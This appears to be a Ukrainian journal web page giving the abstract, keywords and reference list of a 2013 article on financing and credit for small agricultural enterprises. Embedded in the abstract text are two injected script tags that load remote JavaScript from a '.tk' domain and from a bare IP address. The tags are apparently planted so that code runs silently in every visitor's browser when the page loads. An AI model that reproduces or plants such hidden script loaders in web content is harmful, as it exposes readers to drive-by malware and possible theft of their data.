ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 336.221.24:631.162
Сторінка молодого науковця

Фінансово-кредитне забезпечення малих сільськогосподарських підприємств / Олійник К. А. // Економіка АПК. - 2013. - № 1 - С. 150

Розглянуто особливості сучасних кредитних програм комерційних банків для малих сільськогосподарських підприємств. Проведений аналіз дав змогу стверджувати, що для поліпшення кредитного забезпечення діяльності цих форм підприємств необхідно розширювати перелік доступних кредитних програм для формування життєздатного конкурентоспроможного малого аграрного підприємництва. Табл.: 3. Рис.: 4. Бібліогр.: 13.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: малі сільськогосподарські підприємства, фінансово-кредитне забезпечення, програми кредитування малих сільськогосподарських підприємств, Програма мікрокредитування в Україні, агрокредит, фінансування поповнення обігових коштів

Список використаних джерел

 1. Зленко О.В. Запровадження нових механізмів кредитування сільськогосподарських товаровиробників [Електронний ресурс] / О.В. Зленко. - Режим доступу: http://www.nbuv.gov.ua/portal/chem_biol/Agroin/2010_7-9/ZLENKO.pdf.
 2. Кириченко О.А. Кредитування аграрного сектору економіки в умовах глобальної фінансової кризи / О. А. Кириченко, В.Д. Кудри- цький // Актуальні проблеми економіки. - 2009. - №5(95). - С.207 - 222.
 3. Кривень Н.В. Фінансово-кредитні важелі впливу міжнародних програм для стимулювання розвитку мікрокредитування малого бізнесу в Україні / Н.В. Кривень // Вісн. ун-ту банківської справи НБУ. - 2011. - №2(11). - С.77 - 81
 4. Офіційний сайт компанії «Простобанк Консалтинг» [Електронний ресурс]. - Режим доступу: http://www.prostobank.com.
 5. Офіційний сайт ПАТ «Банк «Київська Русь» [Електронний ресурс]. - Режим доступу: http://www.kruss.kiev.ua.
 6. Офіційний сайт ПАТ «КРЕДІ АГРІКОЛБ БАНК» [Електронний ресурс]. - Режим доступу: http://credit-agricole.com.ua.
 7. Офіційний сайт ПАТ «МЕГАБАНК» [Електронний ресурс]. - Режим доступу: http://www.megabank.net/ua.
 8. Офіційний сайт Райффайзен Банк Аваль [Електронний ресурс]. - Режим доступу: http://www.aval.ua.
 9. Пасочник В. Агросектор і його кредитні врожаї [Електронний ресурс] // В. Пасочник // Дзеркало тижня України. - №16. - 2012. - 27 квіт. - Режим доступу до журн.: http://dt.ua/EC0N0MICS/agrosektor_i_yogo_kreditni_vrozhayi-101300.html.
 10. Портал «Світ Агротехнологій» [Електронний ресурс]. - Режим доступу: http://svitagro.com.
 11. Постанова КМУ «Про затвердження державної цільової програми розвитку українського села на період до 2015 року» від 19.09.2007 року [Електронний ресурс]. - Режим доступу: http://zakon.rada.gov.ua.
 12. Практика кредитування МСП в кредитних спілках [Електронний ресурс]. - Режим доступу: http://www.vlasnasprava.info/ua.
 13. Скрипник Ю.В. Кредитування сільськогосподарських підприємств та роль держави у фінансуванні аграрного сектора / Ю.В. Скрипник, Ю.В. Пахненко // Вісн. Сумського нац. аграр. ун-ту. Серія «Фінанси і кредит». - 2007. - №1. - С.28-34.
Читати статтю: 13_01_25.pdf